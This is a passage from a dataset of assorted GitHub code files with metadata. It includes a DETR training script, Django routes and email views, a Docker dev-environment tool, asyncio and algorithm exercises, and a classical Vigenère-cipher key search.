Path(cfg['output_dir'])\n\n if cfg['resume']:\n checkpoint = torch.load(cfg['resume'], map_location='cuda')\n model.load_state_dict(checkpoint['model'])\n\n if 'optimizer' in checkpoint and 'lr_scheduler' in checkpoint and 'epoch' in checkpoint:\n optimizer.load_state_dict(checkpoint['optimizer'])\n lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n cfg['start_epoch'] = checkpoint['epoch'] + 1\n\n print(\"Start training\")\n start_time = time.time()\n for epoch in range(cfg['start_epoch'], cfg['epochs']):\n loss_train = train_one_epoch(\n model, criterion, dataLoader, optimizer, device,\n cfg['clip_max_norm'])\n lr_scheduler.step()\n\n with torch.no_grad():\n loss_val = valid_one_epoch(model, criterion, dataLoader_val, device)\n\n print(\"Epoch: {}, Avarge Train Loss: {:.2f}, Avarge Valid Loss: {:.2f}\".format(epoch, loss_train, loss_val))\n\n with (output_dir / \"log.txt\").open('a') as f:\n f.write(\"Epoch: {}, Train_Loss: {}\".format(\n epoch, loss_train) + \"\\n\" + \"Epoch: {}, Valid_Loss: {}\".format(epoch, loss_val) + \"\\n\")\n\n with (output_dir / \"log.csv\").open('ab') as f:\n np.savetxt(f, np.array(\n [[epoch, loss_train, loss_val]]), delimiter=\",\")\n\n torch.save({\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n 'epoch': cfg['epochs'],\n 'cfgs': cfg,\n }, '{}/checkpoint.pth'.format(output_dir))\n\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n torch.save(model.state_dict(), '{}/wt.pt'.format(cfg['output_dir']))\n print('Training time {}'.format(total_time_str))\n\n\nif __name__ == '__main__':\n with open('config/cfg.yaml', 'r') as loadfile:\n config = yaml.load_all(loadfile, Loader=yaml.FullLoader)\n config_all = [x for x in config]\n\n # train mode\n config = config_all[0]\n\n if config['output_dir']:\n Path(config['output_dir']).mkdir(parents=True, exist_ok=True)\n\n main(config)\n","repo_name":"firslov/DETR-self","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36805082175","text":"from django.urls import path\nfrom . 
import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.conf.urls import url\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nurlpatterns = [\n\n\t# 127.0.0.1:8000/shared\n path('shareNote/', views.shareNote, name=\"shareNote\"),\n path('deleteSharedNote/', views.deleteSharedNote, name=\"deleteSharedNote\"),\n path('noteSharedTo', views.noteSharedTo, name=\"noteSharedTo\"),\n path('getFriends', views.getFriends, name=\"getFriends\"),\n path('sharedNotes', views.sharedNotes, name=\"sharedNotes\"),\n path('getUnshareFriends', views.getUnshareFriends, name=\"getUnshareFriends\"),\n path('commentOnNote', views.commentOnNote.as_view()),\n path('likeOnNote', views.likeOnNote.as_view()),\n path('noteDetails',views.noteDetails, name=\"noteDetails\"),\n path('selfSharedNoteDetails', views.selfSharedNoteDetails, name=\"selfSharedNoteDetails\"),\n path('specificNoteDetail', views.specificNoteDetail, name=\"specificNoteDetail\"),\n path('allUserFriends', views.allUserFriends, name=\"allUserFriends\"),\n path('specificNoteDetailForGit', views.specificNoteDetailForGit, name=\"specificNoteDetailForGit\"),\n path(\"noteDetailsForNative\", views.noteDetailsForNative, name=\"noteDetailsForNative\"),\n path('selfSharedNoteDetailsForNative', views.selfSharedNoteDetailsForNative, name=\"selfSharedNoteDetailsForNative\"),\n path('specificNoteDetailForComments', views.specificNoteDetailForComments, name=\"specificNoteDetailForComments\"),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nurlpatterns=format_suffix_patterns(urlpatterns)\n","repo_name":"abhinavsharma629/WorkSpace-Api","sub_path":"Shared/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9278282461","text":"def solution(record):\n result = []\n ment = ['님이 들어왔습니다.', '', \"님이 나갔습니다.\"]\n users = {}\n for re in record:\n tmp = re.split()\n cmd = tmp[0]\n uid = tmp[1]\n if cmd == \"Enter\":\n name = tmp[2]\n users[uid] = name\n result.append([uid, 0])\n elif cmd == \"Change\":\n name = tmp[2]\n users[uid] = name\n else: # leave\n result.append([uid, 2])\n for i in range(len(result)):\n uid, cmd = result[i]\n result[i] = \"\".join(users[uid])+ment[cmd]\n\n return result\n","repo_name":"MSIQOC/PythonAlgorithmStudy","sub_path":"history/2021/14주차 부르트포스,비트마스킹/프로그래머스/오픈채팅방/김재환.py","file_name":"김재환.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35338814282","text":"import re\nimport shutil\nfrom pathlib import Path\nfrom subprocess import CompletedProcess, run\nfrom typing import Any, Dict, List, NewType, Optional, Tuple\n\nimport srsly\nfrom ._types import EnvData, URLString\nfrom .checks import docker_installed, docker_running, run_docker_checks\nfrom .consts import (\n DEVCONTAINER_TEMPLATE,\n DOCKERFILE_TEMPLATE,\n DOCKERFILE_TEMPLATE_WITH_REQUIREMENTS,\n)\nfrom .github import get_requirements_from_gist\nfrom wasabi import msg\n\n\ndef create(env_data: EnvData):\n run_docker_checks()\n\n folder_path = Path(env_data.folder_name).resolve()\n msg.info(f\"Creating Folder: {folder_path}\")\n folder_path.mkdir(parents=True, exist_ok=False)\n\n msg.info(f\"Creating Environment: {env_data.environment_name}\")\n (folder_path / \".devcontainer\").mkdir(exist_ok=False)\n (folder_path / \".devcontainer\" / \"devcontainer.json\").write_text(\n 
DEVCONTAINER_TEMPLATE.format(environment_name=env_data.environment_name)\n )\n dockerfile_path = folder_path / \"Dockerfile\"\n if env_data.requirements_txt_gist:\n get_requirements_from_gist(env_data.requirements_txt_gist, folder_path)\n dockerfile_path.write_text(\n DOCKERFILE_TEMPLATE_WITH_REQUIREMENTS.format(\n python_version=env_data.python_version\n )\n )\n else:\n dockerfile_path.write_text(\n DOCKERFILE_TEMPLATE.format(python_version=env_data.python_version)\n )\n if env_data.options.build_image:\n msg.info(\"Building Docker Image\")\n run(\n [\n \"docker\",\n \"build\",\n \"-f\",\n str(dockerfile_path),\n \"-t\",\n str(env_data.environment_name),\n str(folder_path),\n ]\n )\n msg.good(\"Built Docker Image\")\n\n srsly.write_yaml(folder_path / \".dispenv.yaml\", env_data.dict())\n\n\ndef cleanup(dispenv_data: Dict[str, Any]) -> None:\n msg.info(\"Removing Folder\")\n folder_path = Path(dispenv_data[\"folder_name\"]).resolve()\n run([\"rm\", \"-rf\", str(folder_path)], capture_output=True)\n msg.info(\"Stopping containers running image.\")\n docker_ps_output = run([\"docker\", \"ps\", \"-a\"], capture_output=True)\n container_ids = get_containers_running_image(\n docker_ps_output, dispenv_data[\"environment_name\"]\n )\n for cid in container_ids:\n run([\"docker\", \"stop\", cid], capture_output=True)\n run([\"docker\", \"rm\", cid], capture_output=True)\n\n msg.info(\"Removing image.\")\n docker_ps_output = run([\"docker\", \"images\"], capture_output=True)\n for image in get_images(docker_ps_output, dispenv_data[\"environment_name\"]):\n run([\"docker\", \"rmi\", image])\n msg.good(\"Cleanup Complete.\")\n\n\ndef _imagecheck(input_image: str, reference_image: str):\n # vscode-dev container start with `vsc`\n input_image = input_image.strip()\n vsc_image = input_image.startswith(f\"vsc-{reference_image}\")\n default_image = input_image == reference_image\n return vsc_image or default_image\n\n\ndef get_containers_running_image(\n docker_ps_process: CompletedProcess, image_name: str\n) -> List[str]:\n lines = [\n line.split()\n for line in docker_ps_process.stdout.decode().split(\"\\n\")[1:]\n if line.strip()\n ]\n container_ids_running_image = [\n line[0].strip() for line in lines if _imagecheck(line[1], image_name)\n ]\n return container_ids_running_image\n\n\ndef get_images(docker_images_process, image_name):\n lines = [\n line.split()\n for line in docker_images_process.stdout.decode().split(\"\\n\")[1:]\n if line.strip()\n ]\n images = [line[0].strip() for line in lines if _imagecheck(line[0], image_name)]\n return images\n","repo_name":"pmbaumgartner/dispenv","sub_path":"src/dispenv/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"35663230852","text":"import pandas as pd\nimport psycopg2 as ps\nfrom configparser import ConfigParser\nfrom sqlalchemy import create_engine\n\n# DATABASE CONFIG\ndef db_config(section, db_cred_path):\n \"\"\"\n Load credentials by a specific item name\n Args:\n item_name (:obj:`str`, required): name of the item that needs to load its value\n cred_path (:obj:`str`, required): Path to the .ini file where credentials are located.\n \"\"\"\n parser = ConfigParser()\n parser.read(db_cred_path)\n db = {}\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = param[1]\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, db_cred_path))\n 
return db\n\ndef db_query(query, section, db_cred_path):\n db_cred = db_config(section, db_cred_path)\n db_uri = 'postgresql://{}:{}@{}:{}/{}'.format(db_cred['user'], db_cred['password'], db_cred['host'], db_cred['port'], db_cred['database'])\n engine = create_engine(db_uri)\n try:\n query_result = pd.read_sql(query, engine)\n return query_result\n except (Exception, ps.DatabaseError) as error:\n print(error)\n\n","repo_name":"thinh-vu/pydata_master","sub_path":"pydata_master/database_connect.py","file_name":"database_connect.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42001693989","text":"#!/usr/bin/env python3\n## Ask user for filename ##\nfilename = input('Please enter the filename:')\n\n## create file object in \"r\"ead mode\nconfigfile = open(filename, 'r')\n\n## display file to the screen - .read()\nconfigblog = configfile.read()\n\n## break configblog across line boundaries (strips out \\n)\nconfiglist = configblog.splitlines()\n\n## display list with no '\\n'\nprint(configlist)\n\n## Count how many lines ##\nprint(len(configlist))\n\n## Always close your file\nconfigfile.close()\n","repo_name":"mjslawson/mycode","sub_path":"cfgread/cfg02.py","file_name":"cfg02.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"12429655189","text":"from microtc.utils import tweet_iterator\nfrom EvoMSA.tests.test_base import TWEETS\nfrom text_models import Vocabulary\nfrom text_models.utils import date_range\nfrom wordcloud import WordCloud as WC\nimport numpy as np\nfrom collections import Counter\nfrom matplotlib import pylab as plt\nfrom scipy.optimize import minimize\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\n# %pylab inline\n\n## Frequency of words\n\nwords = dict()\nfor tw in tweet_iterator(TWEETS):\n text = tw['text']\n for w in text.split():\n key = w.strip()\n try:\n words[key] += 1\n except KeyError:\n words[key] = 1\n\nwords['si']\n\n## Simpler version using Counter\n\nwords = Counter()\nfor tw in tweet_iterator(TWEETS):\n text = tw['text']\n words.update([x.strip() for x in text.split()])\n\nwords['si']\n\n# Zipf's Law\n\nfreq = [f for _, f in words.most_common()]\nrank = range(1, len(freq) + 1)\nplt.plot(rank, freq, '.')\nplt.grid()\nplt.xlabel('Rank')\nplt.ylabel('Frequency')\nplt.tight_layout()\nplt.savefig('zipf_law.png', dpi=300)\n\n\n## Inverse rank\n\nfreq = [f for _, f in words.most_common()]\nrank = 1 / np.arange(1, len(freq) + 1)\nplt.plot(rank, freq, '.')\nplt.grid()\nplt.xlabel('Inverse Rank')\nplt.ylabel('Frequency')\nplt.tight_layout()\nplt.savefig('zipf_law2.png', dpi=300)\n\n## OLS\n\nX = np.atleast_2d(rank).T\nc = np.linalg.lstsq(X, freq, rcond=None)[0]\nc\nhy = np.dot(X, c)\nplt.plot(rank, freq, '.')\nplt.plot(rank, hy)\nplt.legend(['Measured', 'Predicted'])\nplt.grid()\nplt.xlabel('Inverse Rank')\nplt.ylabel('Frequency')\nplt.tight_layout()\nplt.savefig('zipf_law3.png', dpi=300)\n\n# Heaps' Law\n\nwords = Counter()\ntokens_voc= list()\nfor tw in tweet_iterator(TWEETS):\n text = tw['text']\n words.update([x.strip() for x in text.split()])\n tokens_voc.append([sum(list(words.values())),\n len(words)])\n\nn = [x[0] for x in tokens_voc]\nv = [x[1] for x in tokens_voc]\nplt.plot(n, v, '.')\nplt.grid()\nplt.xlabel('Number of tokens')\nplt.ylabel('Vocabulary Size')\nplt.tight_layout()\nplt.savefig('heaps_law.png', dpi=300)\n\n## 
Optimization\n\ndef f(w, y, x):\n k, beta = w\n return ((y - k * x**beta)**2).sum()\n\nn = np.array(n)\nv = np.array(v)\nres = minimize(f, np.array([1, 0.5]), (v, n))\nk, beta = res.x\nk, beta\n\nplt.plot(n, v, '.')\nplt.plot(n, k*n**beta)\nplt.legend(['Measured', 'Predicted'])\nplt.grid()\nplt.xlabel('Number of tokens')\nplt.ylabel('Vocabulary Size')\nplt.tight_layout()\nplt.savefig('heaps_law2.png', dpi=300)\n\n\n# Activities\ndate = dict(year=2022, month=1, day=10)\nvoc = Vocabulary(date, lang='Es', country='MX')\nwords = {k: v for k, v in voc.voc.items() if not k.count('~')}\n\nwc = WC().generate_from_frequencies(words)\nplt.imshow(wc)\nplt.axis('off')\nplt.tight_layout()\nplt.savefig('wordcloud_mx.png', dpi=300)\n\n## Zipf's Law - $$f=\\frac{c}{r}$$\n\ncountries = ['MX', 'CO', 'ES', 'AR',\n 'PE', 'VE', 'CL', 'EC',\n 'GT', 'CU', 'BO', 'DO', \n 'HN', 'PY', 'SV', 'NI', \n 'CR', 'PA', 'UY']\nvocs = Parallel(n_jobs=-1)(delayed(Vocabulary)(date,\n lang='Es',\n country=country)\n for country in tqdm(countries))\nwords = [{k: v for k, v in voc.voc.items() if not k.count('~')}\n for voc in vocs]\n\ndef zipf(data):\n freq = [f for _, f in Counter(data).most_common()]\n rank = 1 / np.arange(1, len(freq) + 1)\n X = np.atleast_2d(rank).T\n return np.linalg.lstsq(X, freq, rcond=None)[0]\n\nzipf_c = [zipf(w) for w in words]\ntokens = [sum(list(w.values())) for w in words]\n\n\nlst = [(a, b[0], c) for a, b, c in zip(countries, zipf_c, tokens)]\nlst.sort(key=lambda x: x[1], reverse=True)\n\nfor a, b, c in lst:\n print(\"| {} | {:0.2f} | {:d} |\".format(a, b,c))\n\n\nX = np.array([(b[0], c) for b, c in zip(zipf_c, tokens)])\ncorr = np.corrcoef(X.T)\n\n\nfor c in corr:\n print(\"| {:0.4f} | {:0.4f} |\".format(*c))\n\n\n## Heaps' Law - $$\\mid v \\mid = kn^\\beta$$\n\nCOUNTRIES = ['MX', 'CO', 'ES', 'AR',\n 'PE', 'VE', 'CL', 'EC',\n 'GT', 'CU', 'BO', 'DO', \n 'HN', 'PY', 'SV', 'NI', \n 'CR', 'PA', 'UY']\n\ndef get_words(date=dict(year=2022, month=1, day=10)):\n \n\n vocs = Parallel(n_jobs=-1)(delayed(Vocabulary)(date,\n lang='Es',\n country=country)\n for country in tqdm(COUNTRIES))\n words = [{k: v for k, v in voc.voc.items() if not k.count('~')}\n for voc in vocs]\n return words \n\n\ndef voc_tokens(data):\n cnt = Counter(data[0])\n output = [[len(cnt), sum(list(cnt.values()))]]\n for x in data[1:]:\n cnt.update(x)\n _ = [len(cnt), sum(list(cnt.values()))]\n output.append(_)\n output = np.array(output)\n return output[:, 0], output[:, 1]\n\ninit = dict(year=2021, month=11, day=1)\nend = dict(year=2021, month=11, day=30)\ndates = date_range(init, end)\nwords = [get_words(d) for d in dates]\nww = [[w[index] for w in words] for index in range(len(COUNTRIES))]\n\nn_mx, v_mx = voc_tokens(ww[0])\n","repo_name":"INGEOTEC/NLP-Course","sub_path":"code/02Vocabulary.py","file_name":"02Vocabulary.py","file_ext":"py","file_size_in_byte":5110,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"68"} +{"seq_id":"32057296676","text":"from collections import defaultdict\n\nfrom ingestor.utils.env import env\nfrom ingestor.utils.logging_service import LoggingService\n\nlogger = LoggingService('extract_hashtags_from_tweets_list').logger\n\nprofile = env('PROFILE_NAME')\n\n\ndef extract_hashtags(tweets: list) -> dict:\n hashtags_found = defaultdict(int)\n\n for tweet in tweets:\n tweet_hashtags = tweet['entities']['hashtags']\n [_add_to_aggregate(hashtags_found, tweet_hashtag['text'].lower()) for tweet_hashtag in tweet_hashtags]\n\n return hashtags_found\n\n\ndef 
_add_to_aggregate(aggregate_dict: dict, key: str):\n aggregate_dict[key] = aggregate_dict[key] + 1\n","repo_name":"DEV3L/archive","sub_path":"projects/learning-journal/brain-bit-ingestor/ingestor/extractors/extract_hashtags_from_tweets_list.py","file_name":"extract_hashtags_from_tweets_list.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2544954348","text":"# Email View\nfrom django.conf import settings\nfrom django.core.mail import EmailMessage, EmailMultiAlternatives\nfrom django.shortcuts import render\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\n\ndef sendEmail(emailto, case, subject, attached):\n email_from = settings.EMAIL_HOST_USER\n recipient_list = [\n emailto,\n ]\n\n if case == \"sign_up\":\n template = 'sendEmail/sign_up_email.html'\n data = f'{settings.BASE_FRONT_URL}/confirm/?code={attached}' #code\n\n elif case == \"reset_password\":\n template = 'sendEmail/reset_password_email.html'\n data = f'{settings.BASE_FRONT_URL}/recoveruser/confirm/?code={attached}' #code\n\n elif case == \"contact_us\":\n template = 'sendEmail/contact_us_response_email.html'\n data = attached #reply\n elif case == \"photo_request_success\":\n template = 'sendEmail/photo_request_success_email.html'\n data = attached #array list. Each element is a dict that contains title, cc and url of the photo approved\n elif case == \"photo_request_failure\":\n template = 'sendEmail/photo_request_failure_email.html'\n data = '' #automessage from template\n\n elif case == 'complete_guest_registration':\n template = 'sendEmail/complete_guest_registration.html'\n data = f'{settings.BASE_FRONT_URL}/complete_guest_registration/?code={attached}'\n\n html_message = render_to_string(template, {'data': data})\n email = EmailMessage(\n subject=subject,\n body=html_message,\n from_email=email_from,\n to=recipient_list,\n )\n email.content_subtype = \"html\"\n if case == \"photo_request_success\":\n for element in attached:\n email.attach_file(settings.MEDIA_ROOT +\n element[\"url\"]) #url without /media/\n email.send()\n return","repo_name":"leit-uchile/memoriafotografica","sub_path":"backend/WebAdmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"16067621945","text":"import time\nimport sys\nfrom threading import Thread\nfrom threading import Lock\n\nclass Th(Thread):\n def __init__ (self, word, esp, texto):\n Thread.__init__(self)\n self.word = word\n self.esp = esp\n self.texto = texto\n\n def run(self):\n lock.acquire()\n if self.word[7] == 'a':\n with open('WordList.txt', 'a') as arq:\n arq.write(self.word)\n else:\n with open('WordList.txt', 'a') as arq:\n arq.write(\" \")\n arq.write(self.word)\n self.chave=montarchave(self.texto,self.word)\n self.textoDes=descifragem(self.texto,self.chave,self.esp)\n if self.textoDes.find('amor') != -1:\n print(\"Texto Desifrado: \"+self.textoDes)\n with open('resposta.txt', 'a') as arq:\n arq.write(textoDes+'\\n')\n arq.write(\"Chave: \"+self.word+\"\\n\")\n lock.release()\n \ndef descifragem(texto, chave, espacos):\n textoDescifrado=\"\"\n for i in range(len(texto)):\n aux = ord(texto[i])-97\n aux2 = ord(chave[i])-97\n temp = ((aux-aux2)%26)+97\n for j in espacos:\n if j.find(',') != -1:\n j = j.split(',')\n if int(j[0]) == i:\n textoDescifrado+=\",\"\n elif j.find('.') != -1:\n j = 
j.split('.')\n if int(j[0]) == i:\n textoDescifrado+=\".\"\n elif int(j) == i:\n textoDescifrado+=\" \"\n textoDescifrado+=chr(temp)\n return textoDescifrado\n\ndef montarchave(texto, chave):\n while(len(chave)/', DetailTransactionView.as_view(), name=\"DetailTransactionView\"),\n path('creatrefinance/', CreateTransactionView.as_view(), name=\"CreateTransactionView\"),\n path('updatefinance//', UpdateTransactionView.as_view(), name=\"UpdateTransactionView\"),\n path('updatetransaction//', ModifierTransactionView.as_view(), name=\"ModifierTransactionView\"),\n path('deletefinance//', DeleteTransactionView.as_view(), name=\"DeleteTransactionView\"),\n path('listefinance/', ListeTransactionView.as_view(), name=\"ListeTransactionView\"),\n path('toutelestransactions/', TransactionListAPIView.as_view(), name=\"TransactionListAPIView\"),\n path('transactions//transaction/', TransactionListUserAPIView.as_view(), name='TransactionListUserAPIView'),\n] ","repo_name":"chakour-ibrahim/mon_test_django","sub_path":"transfert_argent/serviceFinance/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"75009218136","text":"# 05-01. Functions Advanced - Lab\n# 07. Chairs\n\ndef chairs(names, count, curr_names=[]):\n if len(curr_names) == count:\n print(', '.join(curr_names))\n return\n\n for i in range(len(names)):\n curr_names.append(names[i])\n chairs(names[i+1:], count, curr_names)\n curr_names.pop()\n\n\npeople = input().split(', ')\nn = int(input())\n\nchairs(people, n)\n\n# from itertools import combinations\n#\n# result = list(combinations(input().split(', '), int(input())))\n#\n# for x, y in result:\n# print(x, y, sep=', ')\n","repo_name":"emma-metodieva/SoftUni_Python_Advanced_202106","sub_path":"05. Functions Advanced/05-01-07. Chairs.py","file_name":"05-01-07. 
Chairs.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71447870296","text":"# asyncio_queue.py\nimport asyncio\n\n\nasync def consumer(n, q: asyncio.Queue):\n print(f\"consumer {n}: starting\")\n while True:\n print(f\"consumer {n}: waiting for item\")\n item = await q.get()\n print(f\"consumer {n}: has item {item}\")\n if item is None:\n # None은 멈추라는 시그널\n q.task_done()\n break\n else:\n await asyncio.sleep(0.01 * item)\n q.task_done()\n print(f\"consumer {n}: ending\")\n\n\nasync def producer(q: asyncio.Queue, num_workers):\n print(\"producer: starting\")\n # 작업을 시뮬레이션하고자 큐에 몇 개의 수를 추가\n for i in range(num_workers * 3):\n await q.put(i)\n print(f\"producer: added task {i} to the queue\")\n # consumer들에게 종료 시그널을 주고자 큐에 None 항목 추가\n for i in range(num_workers):\n await q.put(None)\n print(\"producer: waiting for queue to empty\")\n await q.join()\n print(\"producer: ending\")\n\n\nasync def main(loop: asyncio.AbstractEventLoop, num_consumers):\n # 고정된 크기의 큐를 생성해 consumer가 항목을 추출할 때까지 producer 가 블로킹한다.\n q = asyncio.Queue(maxsize=num_consumers)\n\n # consumer 작업 예약\n consumers = [loop.create_task(consumer(i, q)) for i in range(num_consumers)]\n\n # producer 작업 예약\n prod = loop.create_task(producer(q, num_consumers))\n\n # 모든 코루틴이 완료될 때까지 대기\n await asyncio.wait(consumers + [prod])\n\n\nevent_loop = asyncio.get_event_loop()\n\ntry:\n event_loop.run_until_complete(main(event_loop, 2))\nfinally:\n event_loop.close()\n","repo_name":"hwangyoungjae/hwangyoungjae.github.io","sub_path":"example/10.5_asyncio/asyncio_queue.py","file_name":"asyncio_queue.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70110834776","text":"import time\r\nimport numpy as np\r\nimport random\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.pylab import figure\r\ndef EWAF(X,Y,options):\r\n\t########################################################\r\n\t########################################################\r\n\t# Change label space from {-1, +1} to {0, 1}\r\n\tY=(Y+1)/2\r\n\t########################################################\r\n\t########################################################\r\n\r\n\tn,d = X.shape\r\n\teta = options['eta']\t\r\n\tW = options['W']\r\n\tN = options['num_all_experts']\r\n\r\n\tw = np.ones(N)/N\r\n\tdelta = options['delta']\r\n\tloss_experts = np.zeros(N)\r\n\tloss_forecaster = 0\r\n\tloss_experts_queried = np.zeros((1,N))\r\n\tloss_experts_unqueried = np.zeros((1,N))\r\n\tnum_queried = 1\r\n\tnum_non_queried = 0\t\r\n\tnum_accurate_preditcted = 0\r\n\r\n\twij_list=[]\r\n\r\n\trandom.seed(time.time())\r\n\tstart = time.time()\r\n\tfor t in range(n):\r\n\t\txt = X[t]\r\n\t\tyt = Y[t]\r\n\r\n\t\t# receive annotations and transfer the annotation from [-1,+1] to [0,+1]\r\n\t\timport pdb\r\n\t\t# pdb.set_trace()\r\n\t\tf=np.maximum(np.zeros(N),np.minimum(np.ones(N), np.dot(W,xt.transpose()).flatten()+0.5))\t\r\n\t\t# add noisy annotations\r\n\t\tfor i in range(options['num_noisy_experts']):\r\n\t\t\tf[5+i]=random.random()\r\n\t\t\r\n\t\t_p_t = np.dot(f,w.transpose())[0,0]\t\t\r\n\t\t\r\n\t\t_hat_y_t = 1 if _p_t >= 0.5 else 0\r\n\r\n\t\t_query_or_not=False\r\n\t\t\r\n\t\tif options['alg_name']=='EWAF':\t\t\t\r\n\t\t\t_query_or_not = True\r\n\t\t\r\n\t\telif options['alg_name']=='AEWAF':\t\t\r\n\t\t\t# if (np.amax(f)-np.amin(f)) > 0.99:\r\n\t\t\t# 
\twij_list.append((np.amax(f)-np.amin(f)))\t\r\n\t\t\t\r\n\t\t\tif (np.amax(f)-np.amin(f)) > delta:\t\t\t\t\r\n\t\t\t\t_query_or_not = True\r\n\t\t\r\n\t\telif options['alg_name'] == 'RAEWAF':\t\t\t\r\n\t\t\t_mu = float(num_non_queried)/(num_queried+1)\r\n\t\t\t_rel = np.zeros((N,N))\r\n\r\n\t\t\tfor i in range(N):\r\n\t\t\t\tfor j in range(N):\t\t\t\t\t\r\n\t\t\t\t\t_rel[i,j] = math.exp( -eta*((1+_mu)*loss_experts_queried[0,i] + loss_experts_queried[0,j]) )\r\n\t\t\t# _rel = np.power(_rel,-eta)\r\n\t\t\t# # print sumRel,f\r\n\t\t\t# if _rel.sum()== 0.0:\r\n\t\t\t# \t# print \"_sum_rel == 0.0 in RAEWAF\"\r\n\t\t\t# \t# print num_non_queried,num_queried,sumRel, _mu, loss_experts_queried\r\n\t\t\t# \tcontinue\r\n\t\t\t\r\n\t\t\t_rel_fij = 0.0\r\n\t\t\tfor i in range(N):\r\n\t\t\t\tfor j in range(i,N):\r\n\t\t\t\t\timport pdb\r\n\t\t\t\t\t# pdb.set_trace()\r\n\t\t\t\t\tabs_fij = abs(f[0,i]-f[0,j])\r\n\t\t\t\t\t_rel_fij = _rel_fij + _rel[i,j]*abs_fij\r\n\t\t\t\t\tif i != j:\r\n\t\t\t\t\t\t_rel_fij = _rel_fij + _rel[j,i]*abs_fij\t\t\r\n\t\t\t_wij = _rel_fij/_rel.sum();\r\n\t\t\t\r\n\t\t\t# wij_list.append(abs(_wij))\r\n\t\t\tif abs(_wij) > delta:\t\t\t\r\n\t\t\t\t_query_or_not = True\r\n\t\telse: # REWAF\r\n\t\t\tif random.random() <= delta:\r\n\t\t\t\t_query_or_not = True\r\n\t\t\r\n\t\t_ell_experts = np.absolute(f-yt)\r\n\t\tloss_experts = loss_experts + _ell_experts\r\n\t\tloss_forecaster = loss_forecaster + abs(_p_t-yt)\r\n\t\t\r\n\t\tif _hat_y_t == yt:\r\n\t\t\tnum_accurate_preditcted += 1\r\n\r\n\t\tif _query_or_not:\r\n\t\t\tnum_queried += 1\t\t\t\r\n\t\t\tloss_experts_queried = loss_experts_queried+_ell_experts\r\n\t\t\t# w = w*np.exp(-eta*_ell_experts)\r\n\t\t\tw = np.exp(-eta*loss_experts_queried)\r\n\t\t\tsum_w = np.sum(w)\r\n\t\t\tw = w/sum_w\r\n\t\telse: \r\n\t\t\tnum_non_queried += 1\t\t\r\n\t\t\r\n\t\t# loss_experts_unqueried = (float(num_non_queried)/float(num_queried))*loss_experts_queried\r\n\r\n\tend = time.time()\r\n\treg = loss_forecaster - np.amin(loss_experts)\t\r\n\t# if len(wij_list):\r\n\t# \tif options['alg_name'] in ['RAEWAF','AEWAF'] and options['que_ind'] == 0 and options['fold_ind']==0:\r\n\t# \t\twij_list.sort()\r\n\t# \t\t# print wij_list[20000],wij_list[10000]\r\n\t# \t\tif options['alg_name'] == 'RAEWAF':\r\n\t# \t\t\twij_list = [x for x in wij_list if x <= 0.00005]\r\n\r\n\t# \t\tfig = plt.figure()\r\n\t# \t\tax = fig.add_subplot(1,1,1) \r\n\t# \t\tplt.hist(np.asarray(wij_list))\r\n\t# \t\tplt.savefig(options['output_file_name']+'_his'+'.pdf')\r\n\t# \t\tplt.close(fig) \r\n\t# \t# print min(wij_list),max(wij_list)\r\n\treturn float(num_queried)/n, float(reg)/n, (end-start), float(num_accurate_preditcted)/n\t","repo_name":"haoshuji/RALEA","sub_path":"python_src/EWAF.py","file_name":"EWAF.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6846164686","text":"#Miikka Mutanen\r\n#23.1.2017\r\n#tehtävä 2-4\r\n#Ohjelma laskee käyttäjän antamat komentorivi\r\n#arkumentit yhteen ja tulostaa ne\r\n#hylkää epäkelvot arkumentit\r\nimport doctest #testausta varten\r\nimport sys\r\n\r\n#Summaa listan luvut\r\n#return summa\r\ndef sum(lista):\r\n\t'''\r\n\t>>> sum([1,2,3,4,5])\r\n\t15\r\n\t>>> sum([0,0,0,0,0])\r\n\t0\r\n\t>>> sum([1.5,0,1.5,0,0])\r\n\t3.0\r\n\t>>> sum([-1.5,0,-1.6,0,0])\r\n\t-3.1\r\n\t>>> sum([-1.5,0,10.5,0,0])\r\n\t9.0\r\n\t>>> 